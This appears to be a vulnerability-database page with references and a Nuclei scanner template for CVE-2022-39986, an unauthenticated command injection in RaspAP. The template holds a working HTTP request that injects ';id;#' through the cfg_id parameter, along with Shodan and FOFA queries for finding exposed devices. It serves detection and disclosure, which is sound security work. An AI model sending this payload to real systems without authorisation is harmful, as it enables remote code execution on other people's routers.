| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| RaspAP 2.8.7 Unauthenticated Command Injection Exploit | 15 Aug 202300:00 | – | zdt | |
| CVE-2022-39986 | 1 Aug 202314:15 | – | attackerkb | |
| The vulnerability of the software for creating wireless routers based on Debian RaspAP, related to the lack of measures taken to clean data at the management level, allows a hacker to execute arbitrary commands. | 17 Oct 202300:00 | – | bdu_fstec | |
| CVE-2022-39986 | 1 Aug 202318:38 | – | circl | |
| RaspAP Command Injection Vulnerability | 1 Aug 202300:00 | – | cnnvd | |
| CVE-2022-39986 | 1 Aug 202300:00 | – | cve | |
| CVE-2022-39986 | 1 Aug 202300:00 | – | cvelist | |
| RaspAP Command Injection vulnerability | 1 Aug 202315:30 | – | github | |
| RaspAP Unauthenticated Command Injection | 15 Aug 202319:50 | – | metasploit | |
| CVE-2022-39986 | 1 Aug 202314:15 | – | nvd |
id: CVE-2022-39986
info:
name: RaspAP 2.8.7 - Unauthenticated Command Injection
author: DhiyaneshDK
severity: critical
description: |
A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
impact: |
Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
remediation: |
Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- https://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-39986
- https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2
- http://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
- https://github.com/RaspAP/raspap-webgui/blob/master/ajax/openvpn/activate_ovpncfg.php
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-39986
cwe-id: CWE-77
epss-score: 0.98725
epss-percentile: 0.99919
cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: raspap
product: raspap
shodan-query: http.favicon.hash:-1465760059
fofa-query: icon_hash=-1465760059
tags: cve,cve2022,packetstorm,raspap,rce,vkev,vuln
http:
- raw:
- |
POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cfg_id=;id;#
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100bc92d1aee49fbedec4e2ee7eff4d5d89e248272fa46e2649c303e36d51ed677302203b9bcdcb3b8f796eeb3ce50d170a16ab1472fb45ebd9154d5aceeadd981349f0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation